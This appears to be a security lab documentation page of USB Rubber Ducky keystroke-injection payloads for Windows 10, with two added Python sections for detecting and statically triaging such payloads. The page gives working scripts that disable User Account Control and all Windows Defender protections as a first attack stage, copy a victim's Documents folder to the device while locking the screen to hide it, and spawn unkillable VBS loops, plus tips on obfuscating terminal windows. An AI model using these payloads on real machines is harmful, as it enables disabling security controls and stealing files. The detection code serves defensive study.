USB Rubber Ducky: Payloads
Summary
This documentation shows examples of using the USB Rubber Ducky on Windows 10 hosts. Many ready-made Ducky Scripts can be found at:
Requirements
- Article on the basics of the device: Hak5 Rubber Ducky
- If you need a different Rubber Ducky firmware, follow this guide: USB Rubber Ducky – Firmware Update.
- Ducky Script Quick Reference.
Description
All scripts start with DELAY 3000, which means a delay of 30000ms / 30s, to make sure that the target PC has time to set up the HID driver. This can potentially be reduced to DELAY 1000 depending on the target host. The scripts could be further improved by adding obfuscation methods to the code. Terminal windows can be changed in colour and size to make them less obvious and much harder to read. The USB Rubber Ducky can also be used to play harmless pranks on your colleagues and friends. Just be sure to clue them in beforehand and don’t let them panic.
Hello World!
Firmware: Duck (Original)
As in any programming language, a basic hello world is a good way to get to know the basic functionality of the system. The following code makes a Windows PC open Notepad, write “Hello World!” in large letters and save the file to the default directory.
    DELAY 3000
    GUI d
    DELAY 2000
    GUI r
    DELAY 500
    STRING c:\windows\notepad.exe
    ENTER
    DELAY 1000
    ALT o
    STRING f
    TAB
    TAB
    STRING 100
    ENTER
    STRING Hello World!
    CTRL s
    STRING totallynotavirus.txt
    ENTER
Disable Windows Defender
Firmware: Duck (Original)
This script first disables Windows User Account Control and then disables all functions of Windows Defender. This could potentially be used to prepare for a second stage of a multi-stage attack. It makes heavy use of menu navigation (arrow keys, tabs) and the Windows 10 search menu. The values of the DELAY commands could be further reduced if used on a fast target host. Note that the script leaves no open windows after concluding its actions.
    DELAY 3000
    REM Disabling User Account Control
    CTRL ESC
    DELAY 200
    STRING uac
    DELAY 200
    ENTER
    DELAY 500
    LEFT
    DELAY 200
    ENTER
    DELAY 200
    TAB
    DELAY 200
    DOWNARROW
    DELAY 200
    DOWNARROW
    DELAY 200
    DOWNARROW
    DELAY 200
    TAB
    DELAY 200
    ENTER
    DELAY 500
    LEFT
    DELAY 200
    ENTER
    DELAY 1000
    REM Disabling Windows Defender
    CTRL ESC
    DELAY 200
    STRING virus pro
    DELAY 200
    ENTER
    DELAY 200
    TAB
    DELAY 200
    TAB
    DELAY 200
    TAB
    DELAY 200
    TAB
    DELAY 200
    TAB
    DELAY 200
    ENTER
    DELAY 200
    SPACE
    DELAY 200
    TAB
    DELAY 200
    SPACE
    DELAY 200
    TAB
    DELAY 200
    SPACE
    DELAY 200
    TAB
    DELAY 200
    TAB
    DELAY 200
    SPACE
    DELAY 200
    ALT F4
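From the defender's side, the payloads on this page share a pattern: a new keyboard is enumerated and, seconds later, a command or script host starts or Defender's real-time protection is switched off. The following is an added example, not part of the original page: it correlates those events over constructed, pre-normalised records; the field names, watch list and 30-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed, pre-normalised events (not real log output); field names are
# assumptions. IDs: 6416 = new external device recognised (Security log),
# 4688 = process creation (Security log), 5001 = Defender real-time
# protection disabled (Windows Defender/Operational log).
EVENTS = [
    {"ts": "2024-05-02T09:14:03", "id": 6416, "class": "Keyboard"},
    {"ts": "2024-05-02T09:14:08", "id": 4688, "image": r"C:\Windows\System32\cmd.exe"},
    {"ts": "2024-05-02T09:14:21", "id": 5001},
    {"ts": "2024-05-02T11:30:00", "id": 4688, "image": r"C:\Windows\System32\cmd.exe"},
    {"ts": "2024-05-02T13:00:00", "id": 6416, "class": "DiskDrive"},
    {"ts": "2024-05-02T13:00:05", "id": 4688, "image": r"C:\Windows\System32\wscript.exe"},
]

# Command and script hosts to watch. cmd.exe and the .vbs host appear in this
# page's payloads; the other entries are added assumptions.
WATCHED = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

def suspicious(ev):
    """True for an event worth tying to a freshly attached keyboard."""
    if ev["id"] == 5001:
        return True
    if ev["id"] == 4688:
        return ev["image"].rsplit("\\", 1)[-1].lower() in WATCHED
    return False

def correlate(events, window_s=30):
    """Return (keyboard_arrival, [follow-up events]) pairs inside the window."""
    events = sorted(events, key=lambda e: e["ts"])  # ISO timestamps sort as text
    alerts = []
    for i, ev in enumerate(events):
        if ev["id"] != 6416 or ev.get("class") != "Keyboard":
            continue  # only keyboard arrivals open a correlation window
        limit = datetime.fromisoformat(ev["ts"]) + timedelta(seconds=window_s)
        hits = [e for e in events[i + 1:]
                if datetime.fromisoformat(e["ts"]) <= limit and suspicious(e)]
        if hits:
            alerts.append((ev, hits))
    return alerts
```

Events 6416 and 4688 are only written when the Audit PNP Activity and Audit Process Creation subcategories are enabled on the host.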
Copy Documents Folder to Ducky
Firmware: Twin Duck
Before using this script, the USB Rubber Ducky must be updated with the Twin Duck firmware. With this firmware, the Rubber Ducky acts both as a HID keyboard and as a USB storage device. The script uses the Windows Run dialog to open the Documents directory and copies all its contents to the storage portion of the Ducky. Note that this script assumes that the storage device will be assigned the drive letter D and must be adjusted if reconnaissance shows another letter would be more likely. The script ends by locking the screen to better hide the copying process.
    DELAY 3000
    GUI d
    DELAY 300
    GUI r
    DELAY 100
    STRING documents
    DELAY 100
    ENTER
    DELAY 100
    CTRL a
    DELAY 100
    CTRL c
    DELAY 100
    ALT F4
    DELAY 100
    GUI r
    DELAY 300
    STRING d:\
    DELAY 100
    ENTER
    DELAY 100
    CTRL v
    DELAY 100
    GUI D
    DELAY 100
    GUI l
Fake Update Screen
Firmware: Duck (Original)
This script launches a website that fakes the Windows update screen in the system’s default internet browser and sets it to full-screen mode. It can’t be easily exited by hitting the Escape key, and hitting the Enter key results in a fake bluescreen.
    DELAY 3000
    GUI d
    DELAY 200
    GUI r
    DELAY 200
    STRING https://www.fakeupdate.net/win10ue/
    ENTER
    DELAY 500
    F11
Maximum Volume Autoplay Audio
Firmware: Duck (Original)
This script showcases how Ducky Script can use the console to create Visual Basic Script files (*.vbs) that can be used to create endless loops of code. It uses the command copy con to create two script files. The first script file is used to create a Windows Media Player object to play a sound file from start to finish from a provided online source. The second script creates a Windows Script Host Shell object that gives the “Volume Up”-command in an endless loop. The only way to end these scripts is by using the task manager or by restarting the system.
    DELAY 3000
    GUI d
    DELAY 200
    GUI r
    DELAY 200
    STRING cmd
    ENTER
    DELAY 500
    STRING del %tmp%\rickyou.vbs
    ENTER
    DELAY 200
    STRING del %tmp%\volup.vbs
    ENTER
    DELAY 200
    STRING cd %tmp% && copy con rickyou.vbs
    ENTER
    STRING While true
    ENTER
    STRING Dim oPlayer
    ENTER
    STRING Set oPlayer = CreateObject("WMPlayer.OCX")
    ENTER
    STRING oPlayer.URL = "http://tinyurl.com/s63ve48"
    ENTER
    STRING oPlayer.controls.play
    ENTER
    STRING While oPlayer.playState <> 1 ' 1 = Stopped
    ENTER
    STRING WScript.Sleep 100
    ENTER
    STRING Wend
    ENTER
    STRING oPlayer.close
    ENTER
    STRING Wend
    ENTER
    DELAY 100
    CTRL z
    ENTER
    STRING copy con volup.vbs
    ENTER
    STRING do
    ENTER
    STRING Set WshShell = CreateObject("WScript.Shell")
    ENTER
    STRING WshShell.SendKeys(chr(&hAF))
    ENTER
    STRING loop
    ENTER
    CTRL z
    ENTER
    STRING start rickyou.vbs && volup.vbs
    ENTER
    STRING exit
    ENTER
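A payload recovered from a device can be reviewed without plugging the device in. The sketch below is an added example, not part of the original page or of Hak5's tooling: it statically reads a Ducky Script and lists what is typed into the Run dialog, which URLs appear and which files are written with copy con. The function and field names are assumptions, and the sample is a shortened excerpt of the payload above.

```python
import re

# Shortened excerpt of the "Maximum Volume Autoplay Audio" payload above.
SAMPLE = r"""
DELAY 3000
GUI r
DELAY 200
STRING cmd
ENTER
STRING cd %tmp% && copy con rickyou.vbs
ENTER
STRING oPlayer.URL = "http://tinyurl.com/s63ve48"
ENTER
CTRL z
ENTER
STRING start rickyou.vbs && volup.vbs
ENTER
"""

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
COPYCON_RE = re.compile(r"\bcopy\s+con\s+(\S+)", re.I)

def triage(script):
    """Statically summarise a Ducky Script payload; nothing is executed."""
    report = {"run_targets": [], "urls": [], "files_written": []}
    in_run_dialog = False  # True between "GUI r" and the next ENTER
    for raw in script.splitlines():
        # One command per line: first token is the command, the rest its argument.
        cmd, _, arg = raw.strip().partition(" ")
        cmd = cmd.upper()
        if not cmd or cmd == "REM":
            continue  # blank line or comment
        if cmd in ("GUI", "WINDOWS") and arg.strip().lower() == "r":
            in_run_dialog = True
        elif cmd == "STRING":
            if in_run_dialog:
                report["run_targets"].append(arg)  # what the Run dialog launches
            report["urls"] += URL_RE.findall(arg)
            report["files_written"] += COPYCON_RE.findall(arg)
        elif cmd == "ENTER":
            in_run_dialog = False
    return report
```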
Used Hardware
- USB Rubber Ducky
- Windows 10 PC
- Ubuntu Linux 20.04 Virtual Machine